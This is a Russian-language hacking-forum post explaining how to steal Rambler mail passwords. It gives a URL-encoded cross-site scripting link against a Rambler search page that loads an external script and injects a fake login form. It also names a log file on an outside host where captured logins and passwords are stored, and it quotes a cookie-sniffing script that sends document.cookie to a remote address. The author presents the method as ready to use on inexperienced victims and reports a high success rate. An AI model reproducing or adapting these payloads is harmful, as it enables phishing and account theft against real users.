да так и есть всё как ты описал-)


"Но всё же лучше сделать редирект не на форму с подменой а на сниффер"
С этим несогласен:
1) не какого редиректа нет...посматрел бы хоть 1.js
2)я же писал выше что феик для сайтов где время жизни сессия приписано данной странички и ли вообще очень мало...т.е. перехватывать кукисы бессмывсленно.
а ты пишешь -
<script>navigate('http://antichat.ru/снифф/s.gif?'.concat(document.cookie))</script>
2-й минус - идут кукисы а не пароль.

А в данном фреике всё путём - конечно расичтано на неопытного юзера который не будет глядеть в титле
и дэкодировать урл-)
однако ~70% сразу авторизируються и пароль и логин у меня в логе.





===================================


Ещё ращ кто не понял как юзать:
даём жертве чей ящик на рамблере - урл:

http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63 %3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6 E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73% 63%72%69%70%74%3E

там наша форма авторизации с левым <form action=

дальше как жертва авторизировалась её пароль и логин записываеться здесь:

http://guap-spb.jino-net.ru/log01.txt